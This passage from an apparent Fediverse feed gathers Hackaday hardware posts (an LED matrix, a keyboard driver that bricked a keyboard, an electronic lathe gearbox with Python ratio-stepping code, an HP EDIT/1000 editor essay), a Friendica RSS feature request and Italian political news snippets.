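    k1, k2 = 2.34, 2.75                         # constants for a square layout
    return k1 * MU0 * n_turns ** 2 * d_avg / (1 + k2 * rho)


def turns_for_target(target_h: float, d_out_m: float, trace_w_m: float,
                     spacing_m: float, max_turns: int = 30):
    """Smallest turn count whose estimated inductance reaches target_h.

    Returns (turns, estimated_L) or None if the geometry cannot get there.
    """
    for n in range(1, max_turns + 1):
        try:
            est = square_spiral_inductance(n, d_out_m, trace_w_m, spacing_m)
        except ValueError:
            return None
        if est >= target_h:
            return n, est
    return None


if __name__ == "__main__":
    l_target = resonant_inductance(TUNING_CAP_F)
    print(f"target inductance: {l_target * 1e6:.2f} uH")
    # Constructed geometry: 50 mm square outline, 0.5 mm trace, 0.5 mm gap.
    result = turns_for_target(l_target, 0.050, 0.0005, 0.0005)
    if result:
        n, est = result
        print(f"{n} turns -> about {est * 1e6:.2f} uH")
```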

Did we mention the Jolly Wrencher is backlit by four side-mounted LEDs? Because what’s an SAO without a few blinkenlights?

2024 Hackaday Supercon SAO Contest


hackaday.com/2024/09/19/2024-s…



Is That A Coaster? No, It’s An LED Matrix!



I’m sure you all love to see some colorful blinkenlights every now and then, and we are of course no exception. While these might look like coasters at a distance, do not be deceived! They’re actually [bitluni]’s latest project!

[bitluni]’s high-fidelity LED matrix started life as some 8×8 LED matrices lying on the shelf for 10 years taunting him – admit it, we’re all guilty of this – before he finally decided to make something with them. That idea took the form of a tileable display with the help of some magnets and pogo pins, which is certainly a very satisfying way to connect these oddly futuristic blinky coasters together.

It all starts with some schematics and a PCB. Because the CH32V208 has an annoying package to solder, [bitluni] opted to have the PCB fab do placement for him. Unfortunately, though, and like any good prototype, it needed a bodge! [bitluni] had accidentally mirrored a chip in the schematic, meaning he had to solder one of the SMD chips on upside-down, “dead bug mode”. Fortunately, the rest was seemingly more successful, because with a little 3D-printed case and some fancy programming, the tiny tiles came to life in all of their rainbow-barfing glory. Sure, the pogo pins were less reliable than desired, but [bitluni] has some ideas for a future version we’re very much looking forward to.

Video after the break.

youtube.com/embed/8wMKw4m6-Rc?…

Has your hunger for blinkenlights not been satiated? More posts about [bitluni] perhaps? How about the time [bitluni] made a very blinkenlight-y “super”computer?


hackaday.com/2024/09/19/is-tha…



Reverse Engineering A Keyboard Driver Uncovers A Self-Destruct Code



Should you be able to brick a keyboard just by writing a driver to flash the lights on it? We don’t think so either. [TheNotary] got quite the shock when embarking on a seemingly straightforward project to learn C++ on the x86-64 architecture with Windows and sent it straight to Silicon Heaven with only a few seemingly innocent USB packets.

The project was a custom driver for the XVX S-K80 mechanical keyboard, aiming to flash LED patterns across the key LEDs and perhaps send custom images to the integrated LCD. When doing this sort of work, the first thing you need is the documentation of the communications protocols. Obviously, this was not an option with a closed-source project, so the next best thing is to spy on the existing Windows drivers and see how they worked. Using Wireshark to monitor the USB traffic whilst twiddling with the colour settings, it was clear that communications were purely over HID messages, simplifying subsequent analysis. Next, they used x32dbg (now x64dbg, but whatever) to attach to the existing driver process and trap a few interesting Windows system calls. After reading around the Windows API, a few candidate functions were identified and trapped. This gave them enough information to begin writing code to reproduce this behaviour. Then things got a bit odd.

There apparently was a lot of extra protocol baggage when performing simple tasks such as lighting an LED. They shortened the sequence to reduce the overhead and noticed an additional byte that they theorized must encode the number of packets to expect in case only a subset of the LEDs were being programmed. Setting this to 0x01 and sending LED code for single keys appeared to work and was much faster but seemed unreliable. After a short experiment with this mystery value, [TheNotary] reverted the code to send all the packets for the full LED set as before, forgetting to correct this mystery value from the 0xFF it was programmed to during the experiment. They were surprised that all the LEDs and LCD were switched off. They were then horrified when the keyboard never powered up again. This value appeared to have triggered an obscure firmware bug and bricked it—a sad end to what would have been a fun little learning project.

Keyboard hacks are so plentiful it’s hard to decide where to start. How about upgrading the keyboard of your trusty ZX81? Here’s a lovely, minimal mechanical keyboard powered by a Pi Pico, and finally while we’re thinking about drivers bricking your stuff, who can forget FTDI gate? We may never forgive that one.

Header image: Martin Vorel, CC BY-SA 4.0.


hackaday.com/2024/09/19/revers…




Hello everyone @Friendica Support !
I filed this issue on github and it has been pretty ignored. Of course I don't expect it to be taken into consideration, but I would like to know if I'm the only one who perceives this feature as a problem. I would also be curious to know if in your opinion the issue is easily solvable, or if it requires an unjustifiable effort?


For those who do not have a GitHub account, I report the text of the Issue here:


Good evening everyone.

Introduction

Like most software in the Fediverse, Friendica accounts can also be "followed" through their RSS feed.

In this way, it is possible to use the string https://INSTANCENAME/feed/USERNAME/

For example, the account of the Friendica group "School" is
poliverso.org/feed/scuola/

Is the feature request related to a problem? Please describe.

Unfortunately, however, the feed of the Fediverse accounts publishes only the contents of that account and not, for example, those reshared.

This choice, although understandable for normal accounts, is much less understandable for Groups (the former Forums), since these groups do not publish (if not rarely) their own contents.

Describe the feature you'd like

The Lemmy developers have brilliantly solved the problem with their "Communities" (the Lemmy version of ActivityPub groups), and today it is possible to follow the feed of the Lemmy communities through the string
https://ISTANZA/feeds/c/NOMEUTENTE.xml?sort=New

And in fact the feed of the "Fediverso" community is perfectly queryable by a feed reader
feddit.it/feeds/c/fediverso.xm…

Even Lemmy displays a feed that presents all the posts published in the local communities (https://ISTANZA/feeds/local.xml?sort=New) and even all those of the federated "timeline" (ISTANZA/feeds/all.xml?sort=New).

I therefore wonder if it is not possible to make it so that at least the "Group" type accounts can display a feed that also includes shared content.

Describe alternatives you've considered

I can't think of any valid alternatives.
I tried in vain to follow a Friendica Group with a Lemmy account (basically I signed up to the "group", which obviously in Lemmy is seen as a "Community"): basically I wanted to use Lemmy to make it export the RSS feed...
Unfortunately, however, there are still problems that do not allow the contents of Friendica to be correctly synchronized in the community view of Lemmy.



Iran, Masih Alinejad: “Democratic countries must stop shaking hands with our murderers”

@Politica interna, europea e internazionale

“Concrete decisions are needed: cut ties with our murderers. The leaders of democratic countries must stop shaking hands with the murderers of Iranian women.” So said Masih Alinejad, an activist for the



Lathe Outfitted with Electronic Gearbox



Running a metal lathe is not for the faint of heart. Without proper knowledge and preparation, these machines can quickly cause injury or destroy expensive stock, tools, or parts. The other major problem even for those with knowledge and preparedness is that some of their more niche capabilities, like cutting threads with a lead screw, can be tedious and complicated thanks to the change gear system found on some lathes. While these are useful tools for getting things done, [Not An Engineer] decided that there was a better way and got to work building an electronic gearbox to automate the task of the traditional mechanical change gear setup in this video.

What makes change gears so tricky is that they usually come as a set of many gears of different ratios, forcing the lathe operator to figure out the exact combination of gears needed to couple the spindle of the lathe to the feed screw at the precise ratio needed for cutting a specific thread pattern. It is possible to do this task but can be quite a headache. [Not An Engineer] first turned to an Arduino Nano to receive input from a rotary encoder connected to the shaft of the lathe and then instruct a motor to turn the feed screw at a set ratio.

The first major problem was that the Arduino was not nearly fast enough to catch every signal from the encoder, leading to a considerable amount of drift in the output of the motor. That was solved by upgrading to a Teensy 4.1 with a 600 MHz clock speed. There was still one other major hurdle to cross: controlling the motor smoothly when an odd ratio is selected. [Not An Engineer] used this algorithm to inspire some code, and with that and some custom hardware to attach everything to the lathe he has a working set of electronic change gears that never need to be changed again. And, if you don’t have a lathe at all but are looking to get started with one, you can always build your own from easily-sourced parts.
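As an added example (not [Not An Engineer]'s firmware), one common way to follow a non-integer spindle-to-leadscrew ratio without accumulating drift: an integer error accumulator in the style of Bresenham's line algorithm. The article does not name the algorithm used in the video, so this is an assumption, and the encoder resolution, motor steps and pitches are constructed inputs.

```python
"""Electronic change gears: spindle encoder counts in, lead-screw motor steps out.

Added example, not [Not An Engineer]'s firmware. The article says the video's
code was inspired by an (unnamed) algorithm; the integer error accumulator
below, in the style of Bresenham's line algorithm, is one common way to follow
a non-integer ratio smoothly and is assumed here, not taken from the video.
Encoder resolution, motor steps and pitches are constructed inputs.
"""
from fractions import Fraction


def gear_ratio(encoder_cpr: int, motor_steps_per_rev: int,
               leadscrew_pitch_mm: str, thread_pitch_mm: str) -> Fraction:
    """Exact motor steps per encoder count needed to cut `thread_pitch_mm`.

    One spindle turn must move the carriage one thread pitch, i.e.
    thread_pitch / leadscrew_pitch lead-screw turns. Pitches are passed as
    strings so that decimal values stay exact (Fraction("1.27") == 127/100).
    """
    screw_turns = Fraction(thread_pitch_mm) / Fraction(leadscrew_pitch_mm)
    return screw_turns * motor_steps_per_rev / encoder_cpr


class RatioStepper:
    """Emit `numerator` motor steps per `denominator` encoder counts, spread
    as evenly as possible, using integers only.

    Because nothing is rounded, after exactly `denominator` counts exactly
    `numerator` steps have been issued, so no drift accumulates however long
    the cut runs. Ratios above 1 yield several steps on some counts.
    """

    def __init__(self, ratio: Fraction):
        if ratio < 0:
            raise ValueError("ratio must be non-negative")
        self.num, self.den = ratio.numerator, ratio.denominator
        self.acc = 0  # error accumulator, kept in [0, den)

    def on_encoder_count(self, direction: int = 1) -> int:
        """Call once per encoder count; returns motor steps to issue now."""
        self.acc += self.num
        steps, self.acc = divmod(self.acc, self.den)
        return steps * direction


def simulate(ratio: Fraction, counts: int) -> list[int]:
    """Steps issued on each of `counts` successive encoder counts."""
    stepper = RatioStepper(ratio)
    return [stepper.on_encoder_count() for _ in range(counts)]


if __name__ == "__main__":
    # Constructed setup: 1024-count encoder, 200-step motor at 16x microstep,
    # 2 mm lead screw, cutting a 1.25 mm metric pitch.
    r = gear_ratio(1024, 3200, "2", "1.25")
    out = simulate(r, 1024)
    print(r, "steps/count ->", sum(out), "steps per spindle turn")
```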

youtube.com/watch?v=iSDNKmk5B2…


hackaday.com/2024/09/19/lathe-…



Design and the Golden Rule



You often learn the golden rule or some variation of it as early as kindergarten. There are several ways to phrase it, but you most often hear: “Do unto others as you would have them do unto you.” While that’s catchy, it is really an aphorism that encourages us to consider the viewpoints of others. As people who design things, this can be tricky. Sometimes, what you want isn’t necessarily what most people want, and — conversely — you might not appreciate what most people want or need.

EDIT/1000


HP/1000 CC-BY-SA-3.0 by [Autopilot]

I learned this lesson many years ago when I used to babysit a few HP/1000 minicomputers. Minicomputer sounds grand, but, honestly, a Raspberry Pi of any sort would put the old HP to shame. Like a lot of computers in those days, it had a text editor that was arcane even by the standards of vi or emacs. EDIT/1000 couldn’t be sure you weren’t using a printing terminal, and the commands reflect that.

For example, printing a few lines around the current line requires the command: “/-2,L,5” which isn’t that hard, I suppose. To delete all lines that contain a percent sign, “1$ D/%/A/” assuming you don’t want to be asked about each deletion.

Sure, sure. As a Hackaday reader, you don’t find this hard to puzzle out or remember. But back in the 1980s, a bunch of physicists and chemical engineers had little patience for stuff like that. However, the editor had a trick up its sleeve.

Old Terminal Basics


Old HP terminals didn’t work like you think of a terminal today. The computer would send a whole screen to the terminal along with some instructions. This was common on several brands of computers, even though it is rare today. For example, the computer might send a form with some data. The user can then use the terminal to modify the data or add new data. Then, with a single keystroke, the entire screen goes back to the computer for processing.

In the case of EDIT/1000, you could invoke screen mode, which would load a page of text into your terminal. Then you could use the arrow keys, insert, delete and the experience wasn’t too far from using a text editor today. Until you wanted to change pages, that is.

You’d use /S to start the screen mode from the current location in a file. But to move forward you needed to use Control+F. Well, that’s if you wanted to send your changes to the computer. You could also move forward and discard your changes by pressing Control+F twice. There were a handful of other commands you could use in screen mode. To do things like search and replace, you still needed the oddball commands along with the Control+X incantation to execute a command while in screen mode.

Complaint Department


We heard no end of complaints about EDIT/1000 and spent a lot of time helping people fix their mistakes made while editing. Training didn’t really seem to help. There didn’t seem to be any other reasonable options as far as buying a different editor.

The problem is, we were split into two camps. People who knew how to use EDIT/1000 well and people who needed to use it, but didn’t really know anything about it.

One More Puzzle Piece


HP terminals of the day all had an interesting feature. The keyboards had nine keys along the top row — what you’d think of as function keys today. The monitors always had eight little spots at the bottom that had labels for what the keys did. The ninth key let you page through a couple of sets of function keys. You can see that in the HP terminal teardown video below.

youtube.com/embed/Rhz4QqS4two?…

So F1 might have “Help” on the screen above it, unless you set the next page where it might say “Clear” or something. The effect was best on the terminals where the keyboard and screen were one piece so the labels lined up.

Then One Day…


I was thinking, probably uncharitably, about how stupid people were that couldn’t learn how to use the editor. I happened to be setting up custom function keys at the time. I wrote a quick program to put a few editor-specific keys on the terminal like “next page” and “previous page” and mapped them to the correct commands.

That worked fine, and then I wrote a short program to launch the editor on a file and put it into screen mode. I grabbed someone passing by and had them try it. By the end of the day, everyone was using “my” editor.

No Genius


I can’t overstate how simple this was. I later reduced it to just a batch file that copied a text file to the terminal to set the function keys, and then launched the editor. And everyone loved it. The people who knew how to use the editor didn’t need all this, of course. And they knew how easy it was. But they loved that it saved people asking dumb questions or messing up their files. The other users just loved it because it made the editor easy.

This predates easy access to the Internet, and a common thing in those days was to trade tapes with other sites. You’d get a magnetic tape in the mail, mount it, look at what was on it, and copy anything you found interesting. Then you’d add anything you had to the end and send it to the next place. In a year or so, the tape would make its way back around to you and the process would repeat. I put my editor on the outbound tape.

Within a year or so, people were literally finding me — hard to do in those days — and sending me real letters thanking me for my editor solution.

The Moral


The script to do this was extremely trivial. It probably took 10 minutes to write and once you knew how to do it, maybe less. But the point was, the people who knew how to write the script didn’t need it. The people who needed it were those who had no more idea how to program function keys than I know how to perform open heart surgery.

It doesn’t matter if it is hardware or software. Getting into the heads of users can really pay off.


hackaday.com/2024/09/19/design…



Former Culture Minister Gennaro Sangiuliano has filed a complaint against entrepreneur Maria Rosaria Boccia


@Politica interna, europea e internazionale
Lawyer Silverio Sica, counsel for former Culture Minister Gennaro Sangiuliano, has filed a complaint against entrepreneur Maria Rosaria Boccia with the Rome Public Prosecutor's Office. The complaint, according to reports from the